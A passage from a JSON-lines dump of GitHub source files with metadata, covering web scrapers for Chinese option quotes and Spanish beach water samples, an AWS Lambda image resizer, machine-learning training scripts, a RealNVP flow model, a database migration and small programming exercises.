'行权'\n]\n\n# for EN user\n# FRONTROW = [\n# 'Date', 'ExpireDate', 'OptionType', 'Strike', 'Contract Name', 'Last',\n# 'Bid', 'Ask', 'Change', '%Change', 'Volume', 'OpenInterest',\n# 'ImpliedVolatility', 'UnderlyingPrice'\n# ]\n\n\ndef match_twins(month: int) -> list:\n prefix = 'http://hq.sinajs.cn/list=OP_'\n # suffix = '_51005017'\n suffix = '_510050'\n url1 = f'{prefix}UP{suffix}{str(month)}'\n url2 = f'{prefix}DOWN{suffix}{str(month)}'\n return get_paried_urls([url1, url2])\n\n\ndef get_paried_urls(twin_list: list) -> list:\n paired_url = []\n for url in twin_list:\n content = urllib.request.urlopen(url, None).read().decode('GBK')\n paired_url.append(get_all_name(content))\n return (re_pair(paired_url))\n\n\ndef get_all_name(content) -> list:\n quo_pos = content.find('\"')\n seg = content[quo_pos + 1:-3]\n stock_list = seg.split(',')\n return stock_list[:-1]\n\n\ndef re_pair(li) -> list:\n finished_pair = []\n for i in range(len(li[0])):\n middle_pair = []\n middle_pair.append(li[0][i])\n middle_pair.append(li[1][i])\n finished_pair.append(middle_pair)\n\n return finished_pair\n\n\n# PAIR to DATA\ndef data_parser(double_query):\n prefix = 'http://hq.sinajs.cn/list='\n\n row = []\n for code in double_query:\n url = prefix + code\n data = urllib.request.urlopen(url, None).read().decode('GBK')\n\n eq_pos = data.find('=')\n params_seg = data[eq_pos + 2:-3]\n params = params_seg.split(',')\n row.extend(params[0:8])\n return row\n\n\n# url->\ndef get_expire_url(month: str) -> str:\n prefixDate = 'http://stock.finance.sina.com.cn/futures/api/openapi.php/StockOptionService.getRemainderDay?date='\n url = f'{prefixDate}{str(month)}'\n return url\n\n\ndef get_expire_date(url_link: str) -> str:\n with urllib.request.urlopen(url_link) as url:\n data = json.loads(url.read().decode())\n # print(data)\n return (data['result']['data']['expireDay'])\n\n\n# Writing to CSV\nwith open('sse_option_data.csv', 'w', newline='') as csvfile:\n writer = csv.writer(csvfile, delimiter=',')\n\n print('started checking and saving data, it might take a few minutes')\n for i in range(12):\n date_string = ''.join(\n (datetime.date.today() +\n datetime.timedelta(i * 365 / 12)).isoformat().split('-'))\n date = get_expire_date(get_expire_url(date_string[:6]))\n\n if len(match_twins(date_string[2:6])) == 0:\n print(f'no data found in month {date_string[4:6]}')\n else:\n writer.writerow([f'{date_string[:6]}'])\n print(f'found data from month {date_string[4:6]}, start saving')\n writer.writerow(FRONTROW)\n for pairs in match_twins(date_string[2:6]):\n writer.writerow([date] + data_parser(pairs))\n writer.writerow([])\n print(f'done with data from month {date_string[4:6]}')\n","repo_name":"casprwang/sse-option-crawler","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} +{"seq_id":"16536246457","text":"import copy\nimport logging\nimport re\nimport sys\nimport urllib2\n\nfrom BeautifulSoup import BeautifulSoup \nfrom calidadaguas import Sample\nfrom calidadaguas import SamplePoint\n\nclass NayadeScraping:\n beaches = []\n\n def __init__(self):\n logging.getLogger('NayadeScraping')\n logging.basicConfig(filename='scraping.log',level=logging.DEBUG)\n\n def scrap(self, id):\n data_soup = BeautifulSoup(urllib2.urlopen('http://nayade.msc.es/Splayas/ciudadano/ciudadanoVerZonaAction.do?codZona=' + str(id)).read())\n # Get the beach samples.\n samples_soup = BeautifulSoup(urllib2.urlopen('http://nayade.msc.es/Splayas/ciudadano/ciudadanoVerZonaAction.do?pestanya=3&codZona=' + str(id)).read())\n\n # This is ugly as hell, but I'm not used to BeautifulSoup.\n data_values = data_soup.findAll('td', {'class' : 'valorCampoI'})\n\n # Check is this a valid ID. There are some keys that are not present, in that case, we continue.\n if data_values[5].string == None:\n logging.debug('Data could not be loaded from id %d', id)\n return\n\n sample_points = samples_soup.findAll('td', {'class' : 'nombreCampoNI'})\n points = []\n samples = []\n for i in range(0, len(sample_points), 6):\n sample_point = SamplePoint.SamplePoint()\n sample_point.name = sample_points[i].string.strip()[-3:]\n # Are we done? Some points have incidents reported, we ignore them.\n if sample_points[i].string.strip() == 'Fecha Cierre Incidente':\n break\n point = data_soup.find(text = re.compile(sample_points[i].string.strip()[-5:].replace('(','').replace(')','')))\n # There are two empty tds. This is awesomic.\n geodata = point.findNext('td', {'class' : 'valorCampoI'})\n geodata = geodata.findNext('td', {'class' : 'valorCampoI'})\n geodata = geodata.findNext('td', {'class' : 'valorCampoI'})\n sample_point.x = geodata.string\n geodata = geodata.findNext('td', {'class' : 'valorCampoI'})\n sample_point.y = geodata.string\n geodata = geodata.findNext('td', {'class' : 'valorCampoI'})\n sample_point.zone = geodata.string\n points.append(sample_point)\n\n # Parse the current samples.\n tds = sample_points[i].findAllNext('td', {'class' : 'valorCampoI'})\n for j in range(0, len(tds), 4):\n sample = Sample.Sample()\n sample.date = tds[j].string\n sample.escherichia_coli = tds[j+1].string\n sample.enterococo = tds[j+2].string\n sample.notes = tds[j+3].string\n sample.samplepoint = sample_point\n samples.append(sample)\n \n if tds[j+3].findNext('td').findNext('td').findNext('td') == None or tds[j+3].findNext('td').findNext('td').findNext('td').get('class', None) == 'nombreCampoNI':\n break\n\n # We cannot rely in the order in which tds are created, because some data is variable.\n # Parse again looking for the UTM coordinates.\n\n # Generate the beach structure as it will be written in csv columns.\n beach = { \n 'Comunidad': data_values[0].string,\n 'Provincia': data_values[1].string,\n 'Municipio': data_values[2].string,\n 'Nombre': data_values[5].string,\n 'adoptada_por': 'penyaskito (scrapping)',\n }\n # Normalize data. We need to strip bad chars that could act as separators and fix the encoding.\n for key, value in beach.iteritems():\n beach[key] = value.strip().encode(\"utf-8\") \n\n # Save a row for each sample point.\n for sample in samples:\n logging.info('Data obtained for %s with id %d and sample %s %s', beach['Nombre'], id, sample.samplepoint.name, sample.date)\n beach['punto_muestreo'] = sample.samplepoint.name\n beach['utm_zone'] = sample.samplepoint.zone\n beach['utm_x'] = sample.samplepoint.x\n beach['utm_y'] = sample.samplepoint.y\n beach['fecha_toma'] = sample.date\n beach['escherichia_coli'] = sample.escherichia_coli\n beach['enterococo'] = sample.enterococo\n beach['observaciones'] = sample.notes\n\n # Save the sample point\n self.beaches.append(copy.copy(beach))\n","repo_name":"openkratio/calidad-aguas","sub_path":"old/calidadaguas/NayadeScraping.py","file_name":"NayadeScraping.py","file_ext":"py","file_size_in_byte":4032,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71429473448","text":"import boto3\nimport uuid\nimport traceback\nfrom PIL import Image\nimport PIL.Image\nfrom resizeimage import resizeimage\nimport os\n\nTHUMBNAIL_SIZE = [250, 250]\n\ndef image_resize(image_source_path, resized_cover_path):\n with Image.open(image_source_path) as image:\n cover = resizeimage.resize_cover(image, THUMBNAIL_SIZE)\n cover.save(resized_cover_path, image.format)\n\ndef handler(event, context):\n s3_client = boto3.client('s3')\n try: \n for record in event['Records']:\n bucket = record['s3']['bucket']['name']\n key = record['s3']['object']['key']\n item_uuid=uuid.uuid4()\n os.mkdir('/tmp/{}'.format(item_uuid))\n download_path = '/tmp/{}/{}'.format(item_uuid, key)\n upload_path_thumbnail = '/tmp/resized-{}'.format(key)\n uploadToBucket = 'cloudcomputingcourse2018output'\n uploadFilename = 'resized/resized-'+key \n \n s3_client.download_file(bucket, key, download_path)\n image_resize(download_path, upload_path_thumbnail)\n s3_client.upload_file(upload_path_thumbnail, \n uploadToBucket, uploadFilename)\n except Exception:\n print(traceback.format_exc())\n \n","repo_name":"arshdeepbahga/cloud-computing-solutions-architect-book-code","sub_path":"Chapter-4/resizeimages/lambda.py","file_name":"lambda.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"53"} +{"seq_id":"74287584806","text":"# Handles various processes in game\n\nimport random\nimport json\nimport constants as c\n\n\ndef get_all_texts():\n \"\"\"Retrieve texts from JSON\"\"\"\n try:\n with open(c.text_file_name, \"r\") as f:\n return json.load(f)\n except:\n return [\"texts.json doesn't exist. Run reqtexts.py first.\"]\n\n\ndef get_text(all_texts):\n \"\"\"Get one text from all texts and remove it from the list (Mutates list)\"\"\"\n text = all_texts.pop(int(random.random() * len(all_texts)))\n\n if len(all_texts) <= 0:\n all_texts.extend(get_all_texts())\n\n return text\n\n\ndef get_best_time():\n try:\n with open(c.best_time_file_name, \"r\") as f:\n return f.read()\n except:\n return \"\"\n\n\ndef compare_best_time(current_time):\n \"\"\"Compare best time, and if so saves best time to txt file\"\"\"\n best_time = get_best_time()\n\n if best_time == \"\" or float(current_time) < float(best_time):\n with open(c.best_time_file_name, \"w\") as f:\n f.write(str(round(current_time, 3)))\n\n return True\n else:\n return False\n\n\ndef setup_player_enemy_interaction(player, enemy, enemy_hp_bar):\n \"\"\"This is where the player actually deal damage after attack animation\"\"\"\n def player_attack(damage):\n # Damage\n enemy.hurt_damage(damage)\n # Update enemy hp bar\n enemy_hp_bar.value = enemy.current_health / enemy.health\n\n player.attack_callback = player_attack\n\n\ndef reset_state(player, enemy):\n \"\"\"Reset player damage and enemy health (For restart game)\"\"\"\n player.reset_damage()\n enemy.current_health = c.ENEMY_HEALTH\n","repo_name":"bluwy/supertyper","sub_path":"processhandle.py","file_name":"processhandle.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22804495107","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport re\nfrom typing import List\nfrom pathlib import Path\n\n\ndef rmdawn(in_files: List[str]) -> str:\n \"\"\"Create an R markdown file from YAML, markdown, and code files.\n\n :param in_files: A list of YAML, markdown, and code file names.\n :param return: A string containing the output R markdown file.\n \"\"\"\n return \"\\n\\n\".join([\n # YAML files\n \"---\\n\" + Path(name).read_text() + \"\\n---\"\n if name.endswith((\".yaml\", \"yml\"))\n\n # Code files that start with knitr spin comments\n else re.sub(\"#\\+ (.*?)\\n\", r\"```{\\1}\\n\",\n Path(name).read_text()) + \"\\n```\"\n if Path(name).read_text().startswith(\"#+\")\n and name.endswith((\".py\", \".r\", \".R\"))\n\n # R files that do not start with knitr spin comments\n else \"```{r}\\n\" + Path(name).read_text().strip() + \"\\n```\"\n if name.endswith((\".r\", \".R\"))\n\n # Python files that do not start with knitr spin comments\n else \"```{python}\\n\" + Path(name).read_text().strip() + \"\\n```\"\n if name.endswith(\".py\", )\n\n # All other files (markdown, txt, etc.)\n else Path(name).read_text()\n for name in in_files\n ])\n","repo_name":"py4ds/rmdawn","sub_path":"src/rmdawn/rmdawn.py","file_name":"rmdawn.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"3942005287","text":"tests = int(input())\n\nfor _ in range(tests):\n n = int(input())\n arr = list(map(int, input().split()))\n arr.sort()\n \n p1 = 0\n p2 = 1\n flag = False\n \n while p2 < n:\n if n == 1:\n print(\"YES\")\n break\n \n elif arr[p2] - arr[p1] > 1:\n print(\"NO\")\n flag = True\n break\n \n p1+=1\n p2+=1\n \n if flag == False:\n print(\"YES\")\n \n","repo_name":"Beki4382/Competitive-Programming","sub_path":"removeSmallest.py","file_name":"removeSmallest.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3732376385","text":"import pybullet as pb\nfrom highlevel_planning_py.tools.util import ObjectInfo\nfrom highlevel_planning_py.sim.world import WorldPybullet\nimport numpy as np\nfrom scipy.spatial.transform import Rotation as R\nimport os\n\n\ndef get_cupboard_info(base_dir, pos, orient, scale=0.6, force_fixed_base=False):\n urdf_file = \"parsed_xacros/cupboard2.urdf\"\n urdf = os.path.join(base_dir, urdf_file)\n\n world = WorldPybullet(\"direct\", sleep=False)\n tmp_model = world.add_model(urdf, position=pos, orientation=orient, scale=scale)\n\n rot = R.from_quat(orient)\n yaw = rot.as_euler(\"xyz\", degrees=False)\n nav_angle = yaw[2] + np.pi * 3.0 / 2.0\n\n drawer_joint_idx = list()\n handle_link_idx = list()\n for i in range(pb.getNumJoints(tmp_model.uid, physicsClientId=world.client_id)):\n info = pb.getJointInfo(tmp_model.uid, i, physicsClientId=world.client_id)\n joint_name = info[1] if type(info[1]) is str else info[1].decode(\"utf-8\")\n # print(info)\n if \"drawer_joint\" in joint_name and len(joint_name) == 13:\n drawer_joint_idx.append(i)\n if \"drawer_handle_dummy_joint\" in joint_name:\n # handle_num = int(joint_name.split(\"drawer_handle_dummy_joint\")[1])\n handle_link_idx.append(info[16])\n\n world.close()\n\n grasp_orient = R.from_euler(\"xzy\", [180, 0, -45], degrees=True)\n return ObjectInfo(\n urdf_path_=urdf_file,\n urdf_relative_to_=\"asset_dir\",\n init_pos_=np.array(pos),\n init_orient_=np.array(orient),\n init_scale_=scale,\n grasp_pos_={link: [np.array([0.0, 0.0, 0.0])] for link in handle_link_idx},\n grasp_orient_={link: [grasp_orient.as_quat()] for link in handle_link_idx},\n nav_angle_=nav_angle,\n nav_min_dist_=0.6,\n grasp_links_=handle_link_idx,\n joint_setting_=[\n {\"jnt_idx\": i, \"mode\": pb.VELOCITY_CONTROL, \"force\": 0.0}\n for i in drawer_joint_idx\n ],\n force_fixed_base_=force_fixed_base,\n )\n","repo_name":"ethz-asl/high_level_planning","sub_path":"highlevel_planning_ros/src/highlevel_planning_py/sim/cupboard.py","file_name":"cupboard.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22155651008","text":"import pandas as pd\nimport numpy as np\nfrom ast import literal_eval\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier\nfrom xgboost.sklearn import XGBClassifier\nfrom sklearn.model_selection import StratifiedKFold\nimport sys\n\n\ndef select_top_features(train_df, test_df, feature_importance_df, num_features, model_name):\n\n\tfeature_importance_df = feature_importance_df.sort_values(model_name, ascending = False)\n\tfeatures = feature_importance_df.iloc[:num_features]['Features'].tolist()\n\n\ttrain_df = train_df[features]\n\ttest_df = test_df[features]\n\n\treturn train_df, test_df\n\ndef ensemble_model(parameters_dataset, train_dataset, test_dataset, feature_importance_dataset):\n\tparameters_df = pd.read_csv(parameters_dataset)\n\ttrain_df = pd.read_csv(train_dataset)\n\ttest_df = pd.read_csv(test_dataset)\n\tfeature_importance_df = pd.read_csv(feature_importance_dataset)\n\n\tprint(train_df.shape)\n\tprint(test_df.shape)\n\n\ttrain_df['record_id'] = train_df.index\n\n\ty_train = train_df['READMISSION']\n\n\tk_folds = StratifiedKFold(n_splits=5, random_state=42, shuffle=True)\n\n\tfor i in range(parameters_df.shape[0]):\n\t\tmodel_name = parameters_df.iloc[i]['Name']\n\n\t\tprint(model_name)\n\n\t\tmodel_params = parameters_df.iloc[i]['Best Parameters']\n\t\tmodel_params = literal_eval(model_params)\n\n\t\tif 'Logistic Regression' in model_name:\n\t\t\tmodel_params['n_jobs'] = -1\n\t\t\tmodel_type_name = 'Logistic Regression'\n\t\t\tmodel = LogisticRegression(**model_params)\n\t\telif 'Random Forest' in model_name:\n\t\t\tmodel_params['n_jobs'] = -1\n\t\t\tmodel_type_name = 'Random Forest All'\n\t\t\tmodel = RandomForestClassifier(**model_params)\n\t\telse:\n\t\t\tmodel_type_name = 'XGBoost'\n\t\t\tmodel = XGBClassifier(**model_params)\n\n\t\tif 'Top' in model_name:\n\t\t\tnum_features = int(model_name.split(' ')[-1])\n\t\t\tX_train, X_test = select_top_features(train_df, test_df, feature_importance_df,\n\t\t\t\tnum_features, model_type_name)\n\t\telse:\n\t\t\tX_train = train_df.drop(['READMISSION', 'record_id'], axis = 1)\n\t\t\tX_test = test_df.drop('READMISSION', axis = 1)\t\t\t\n\n\t\tindividual_model_pred = pd.DataFrame()\n\n\t\tfor train_index, test_index in k_folds.split(X_train, y_train):\n\t\t\tmodel.fit(X_train.iloc[train_index], y_train[train_index])\n\t\t\tpredictions = model.predict(X_train.iloc[test_index]).reshape(-1, 1)\n\t\t\tdata = np.concatenate([test_index.reshape(-1, 1), predictions], axis = 1)\n\t\t\tindividual_model_pred_sub = pd.DataFrame(data, columns=['record_id', model_name + '_Prediction'])\n\t\t\tindividual_model_pred = pd.concat([individual_model_pred, individual_model_pred_sub])\n\n\t\ttrain_df = train_df.merge(individual_model_pred, how = 'left', on = 'record_id')\n\t\t\n\t\tmodel.fit(X_train, y_train)\n\t\ttest_df[model_name + '_Prediction'] = model.predict(X_test).reshape(-1, 1)\n\n\ttrain_df = train_df.drop('record_id', axis = 1)\n\n\tprint(train_df.shape)\n\tprint(test_df.shape)\n\n\ttrain_df.to_csv(train_dataset.replace('.csv', '_ensemble.csv'), index = False)\n\ttest_df.to_csv(test_dataset.replace('.csv', '_ensemble.csv'), index = False)\n\nparameters_dataset = sys.argv[1]\ntrain_dataset = sys.argv[2]\ntest_dataset = sys.argv[3]\nfeature_importance_dataset = sys.argv[4]\nensemble_model(parameters_dataset, train_dataset, test_dataset, feature_importance_dataset)\n\n\n\n","repo_name":"pateli18/Machine-Learning-Nanodegree","sub_path":"capstone_project/helper_functions/create_ensemble_model.py","file_name":"create_ensemble_model.py","file_ext":"py","file_size_in_byte":3228,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"28942305810","text":"import tensorflow as tf\nfrom TFRunner import TFRunner\nimport multiprocessing\nfrom glob import glob\nfrom DatasetLoader import DatasetLoader\nfrom Model import Model\n\nflags = tf.app.flags\nFLAGS = flags.FLAGS\nflags.DEFINE_integer('training_epochs', 20, 'number of times to run through training dataset')\nflags.DEFINE_integer('batch_size', 50, 'batch size')\nflags.DEFINE_string('train_files_glob', './input/train*.tfrecords', 'glob for TFRecords files containing training data')\nflags.DEFINE_string('model_file', './model.ckpt', 'path to save trained model parameters to')\nflags.DEFINE_integer('read_threads', multiprocessing.cpu_count(), 'number of reading threads')\nflags.DEFINE_string('profile', None, 'a Chrome trace file will be written at the specified path for the first training batch')\nflags.DEFINE_string('summary', './tensorboard_train', 'Tensorboard output directory')\n\n# Training input\ndataset_loader = DatasetLoader()\nkeep_prob_holder = tf.placeholder(tf.float32, shape = ())\nimage_batch, label_batch = dataset_loader.input_shuffle_batch(\n glob(FLAGS.train_files_glob), FLAGS.batch_size, FLAGS.read_threads, num_epochs = FLAGS.training_epochs)\nlabel_batch = tf.cast(label_batch, tf.float32)\n\n# Model, loss function, and training op\ninferred_labels = Model.create_graph(image_batch, keep_prob_holder)\ncross_entropy = -tf.reduce_sum(tf.cast(label_batch, tf.float32) * tf.log(tf.maximum(inferred_labels, 1e-10)),\n reduction_indices=[1])\nbatch_avg_cross_entropy = tf.reduce_mean(cross_entropy)\ntraining_op = tf.train.AdamOptimizer(1e-4).minimize(batch_avg_cross_entropy)\n\n# Add loss and training accuracy to Tensorboard output\ncorrect_prediction = tf.equal(tf.argmax(inferred_labels, 1), tf.argmax(tf.cast(label_batch, tf.float32), 1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\ntf.summary.scalar(\"loss\", batch_avg_cross_entropy)\ntf.summary.scalar(\"training accuracy\", accuracy)\n\n# Run graph\nTFRunner.run(\n training_op,\n feed_dict = {keep_prob_holder: 0.5},\n save_checkpoint = FLAGS.model_file,\n profile = FLAGS.profile,\n summary = FLAGS.summary,\n summary_every = 10\n)\n","repo_name":"lightcycle/MachineLearningWithTensorFlow","sub_path":"Example-PhotoOrientation/train/Train.py","file_name":"Train.py","file_ext":"py","file_size_in_byte":2144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27847263369","text":"#Family name: Ogunsanya Toluwani Damilola\n# Student number: 8677256\n# Course: IT1 1120\n# Assignment Number 5 Part 3\ndef digit_sum(n):\n '''(list of integers) -> integers\n returns the sum of all digits in a given number'''\n if n > 0:\n\n x = 10*(round(n/10 - n//10,1)) + digit_sum(n//10)\n return int(x)\n return 0\n\ndef digital_root(n):\n '''(list of integers) -> integers\n returns the sum of all digits as an integer less than 10'''\n x = n\n\n if x > 10:\n x = digit_sum(x)\n\n if x >10:\n x = digital_root(x)\n\n return x\n\n\n","repo_name":"ToluwaniO/ITI1120","sub_path":"a5_8677256/a5_part3_8677256.py","file_name":"a5_part3_8677256.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21524493583","text":"import abc\nfrom dataclasses import dataclass\nfrom typing import Any\n\nimport numpy as np\nfrom dm_env import specs\n\nfrom mava.components.jax import Component\nfrom mava.core_jax import SystemBuilder\n\n\n@dataclass\nclass ExtrasLogProbSpecConfig:\n pass\n\n\nclass ExtrasSpec(Component):\n @abc.abstractmethod\n def __init__(self, config: Any) -> None:\n \"\"\"Initialise extra specs\n\n Args:\n config : ExtrasSpecConfig\n \"\"\"\n self.config = config\n\n @staticmethod\n def name() -> str:\n \"\"\"Returns name of ExtrasSpec class\n\n Returns:\n \"extras_spec\": name of ExtrasSpec class\n \"\"\"\n return \"extras_spec\"\n\n\nclass ExtrasLogProbSpec(ExtrasSpec):\n def __init__(\n self,\n config: ExtrasLogProbSpecConfig = ExtrasLogProbSpecConfig(),\n ):\n \"\"\"Class that adds log probs to the extras spec\n\n Args:\n config : ExtrasLogProbSpecConfig\n \"\"\"\n self.config = config\n\n def on_building_init_end(self, builder: SystemBuilder) -> None:\n \"\"\"Create extra specs after builder has been initialised\n\n Args:\n builder: SystemBuilder\n\n Returns:\n None.\n\n \"\"\"\n agent_specs = builder.store.ma_environment_spec.get_agent_environment_specs()\n builder.store.extras_spec = {\"policy_info\": {}}\n\n for agent, spec in agent_specs.items():\n # Make dummy log_probs\n builder.store.extras_spec[\"policy_info\"][agent] = np.ones(\n shape=(), dtype=np.float32\n )\n\n # Add the networks keys to extras.\n int_spec = specs.DiscreteArray(len(builder.store.unique_net_keys))\n agents = builder.store.ma_environment_spec.get_agent_ids()\n net_spec = {\"network_keys\": {agent: int_spec for agent in agents}}\n builder.store.extras_spec.update(net_spec)\n","repo_name":"alaterre/Mava","sub_path":"mava/systems/jax/ippo/components.py","file_name":"components.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"22307286312","text":"\"\"\"Remove unnecessary columns\n\nRevision ID: 73765744a1f6\nRevises: 37f73a9d15d5\nCreate Date: 2022-04-02 11:19:02.574169+00:00\n\n\"\"\"\nimport sqlalchemy as sa\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = \"73765744a1f6\"\ndown_revision = \"37f73a9d15d5\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column(\"collectibles\", \"owned\")\n op.drop_column(\"records\", \"completed\")\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column(\"records\", sa.Column(\"completed\", sa.BOOLEAN(), autoincrement=False, nullable=False))\n op.add_column(\"collectibles\", sa.Column(\"owned\", sa.BOOLEAN(), autoincrement=False, nullable=False))\n # ### end Alembic commands ###\n","repo_name":"TheDescend/elevatorbot","sub_path":"Backend/alembic/versions/73765744a1f6_.py","file_name":"73765744a1f6_.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"41129170648","text":"\"\"\"Defines the neural network, losss function and metrics\"\"\"\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n# defining RealNVP network (https://github.com/senya-ashukha/real-nvp-pytorch/blob/master/real-nvp-pytorch.ipynb)\nclass RealNVP(nn.Module): # base class Module\n def __init__(self, nets, nett, mask, prior, system, input_dimension):\n super(RealNVP, self).__init__()\n\n self.prior = prior\n self.mask = nn.Parameter(mask, requires_grad=False)\n self.t = torch.nn.ModuleList([nett() for _ in range(len(mask))]) # translation function (net)\n self.s = torch.nn.ModuleList([nets() for _ in range(len(mask))]) # scaling function (net)\n # nn.ModuleList is basically just like a Python list, used to store a desired number of nn.Module’s.\n self.logp = 1.0 # initialize to 1\n self.system = system # class of what molecular system are we considering. E.g. Ising.\n self.orig_dimension = input_dimension # tuple describing original dim. of system. e.g. Ising Model with N = 8 would be (8,8)\n\n def g(self, z):\n log_R_zx, x = z.new_zeros(z.shape[0]), z\n\n for i in range(len(self.t)): # for each layer\n x_ = x*self.mask[i] # splitting features between channels.\n # features selected here used to compute s(x) and f(x) but not updated themselves yet.\n s = self.s[i](x_)*(1 - self.mask[i])\n t = self.t[i](x_)*(1 - self.mask[i])\n x = x_ + (1 - self.mask[i]) * (x * torch.exp(s) + t)\n log_R_zx += torch.sum(s,-1)\n return x, log_R_zx\n\n def f(self, x):\n log_R_xz, z = x.new_zeros(x.shape[0]), x\n\n # new_zeros(size) returns a Tensor of size \"size\" filled with 0s\n for i in reversed(range(len(self.t))): # move backwards through layers\n z_ = self.mask[i] * z # tensor of size num samples x num features\n s = self.s[i](z_) * (1-self.mask[i]) # self.s[i] is the entire sequence of scaling operations\n t = self.t[i](z_) * (1-self.mask[i])\n z = (1 - self.mask[i]) * (z - t) * torch.exp(-s) + z_\n log_R_xz -= s.sum(dim=-1)\n # each pass through here applies all operations defined in nets() and all the ones defined in nett()\n # self.s[1](z_) is not the same as self.s[3](z_)\n self.log_R_xz = log_R_xz # save so we can reference it later\n return z, log_R_xz\n\n def forward(self, x):\n z, self.logp = self.f(x)\n return z\n\n def log_prob(self,x):\n z, logp = self.f(x) # z = f(x)\n return self.prior.log_prob(z) + logp\n\n def sample(self, batchSize):\n z = self.prior.sample_n(batchSize)\n logp = self.prior.log_prob(z)\n x, log_R_zx = self.g(z)\n return z.detach().numpy() , x.detach().numpy()\n\n def loss(self, batch, w_ml = 1.0, w_kl = 0.0, w_rc = 0.0):\n return w_ml*self.loss_ml(batch) + w_kl*self.loss_kl(batch) + w_rc*self.loss_rc(batch)\n\n def loss_ml(self, batch):\n z, log_R_xz = self.f(batch)\n self.energies = self.calculate_energy(batch)\n return self.expected_value(0.5*torch.norm(z,dim=1)**2 - log_R_xz)\n\n def loss_kl(self, batch_z):\n x, log_R_zx = self.g(batch_z)\n self.energies = self.calculate_energy(x)\n return self.expected_value(self.energies - log_R_zx)\n\n def loss_kl_ising(self, batch_z):\n x, log_R_zx = self.g(batch_z)\n self.energies = self.calculate_energy(torch.sign(x))\n return self.expected_value(self.energies - log_R_zx)\n\n def calculate_energy(self, batch):\n energies = batch.new_zeros(batch.shape[0])\n\n e_high = 10**4\n for i in range(batch.shape[0]): # for each x in the batch\n config = batch[i,:].reshape(self.orig_dimension) # reshape into correct form\n energies[i] = self.system.energy(config)\n if abs(energies[i]) == float('inf'):\n print(\"energy overflow detected\")\n elif energies[i] > e_high:\n energies[i] = e_high + torch.log(energies[i] - e_high + 1.0)\n\n self.weights = torch.exp(-energies*0.0) # simple average\n return energies\n\n def expected_value(self, observable):\n return torch.dot(observable,self.weights)/torch.sum(self.weights)\n","repo_name":"jbinagia/CS-230-Final-Project","sub_path":"project/networks/net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":4337,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"26436788768","text":"import re\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport scipy.stats as stats\n\nLOG_PATH = \"../logs/72rs__.txt\"\n\nrs = []\ndics = []\nd = open(LOG_PATH, \"r\").read().splitlines() + open(\"../logs/72rs_.txt\", \"r\").read().splitlines()\nfor l in d:\n if 'R: 0.' in l:\n r = float(l.split(\": \")[1])\n rs.append(r)\n if 'DIC' in l:\n dic = float(l.split(\": \")[1])\n dics.append(dic)\n#print(dics)\n#rs = dics\nprint(len(rs))\nrs_shuffle = rs[:-2]\nallo_r = rs[-2]\nego_r = rs[-1]\n\ncounts, bins = np.histogram(rs_shuffle, bins=20)\nplt.hist(bins[:-1], bins, weights=counts / max(counts))\ng = stats.norm.pdf(bins, np.mean(rs_shuffle), np.std(rs_shuffle))\ng /= max(g)\nplt.plot(bins, g)\n\n#plt.show()\n#h = plt.hist(rs_shuffle, bins=30)[0]\nplt.plot([allo_r, allo_r], [0, plt.gca().get_ylim()[1]])\n\nz = stats.zscore(rs)[-2] # allo z-score\np_val = 1-stats.norm.cdf(z)\nplt.title(f\"Z-score: {z:.3}; p_value {p_val:.4}\")\nplt.savefig(f'C:/tmp/cosyne-figs/72_shuffles.pdf', bbox_inches='tight', dpi=300) \nplt.show()","repo_name":"1tux/neural-analysis","sub_path":"scripts/analyze_logs_cosyne.py","file_name":"analyze_logs_cosyne.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"29626125394","text":"from keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten, Lambda, ELU\nfrom keras.layers.convolutional import Convolution2D\nfrom keras.layers.pooling import MaxPooling2D\nfrom keras.optimizers import Adam \nfrom keras.models import model_from_json\nfrom itertools import zip_longest\nimport cv2\nimport numpy as np\nimport csv, argparse\nimport os, errno\nimport matplotlib.pyplot as plt\n\ndef file_len(fname):\n i = -1\n with open(fname) as f:\n for i, l in enumerate(f):\n pass\n return i + 1\n\ndef remove(filename):\n try:\n os.remove(filename)\n except OSError as e:\n if e.errno != errno.ENOENT:\n raise\n \ndef 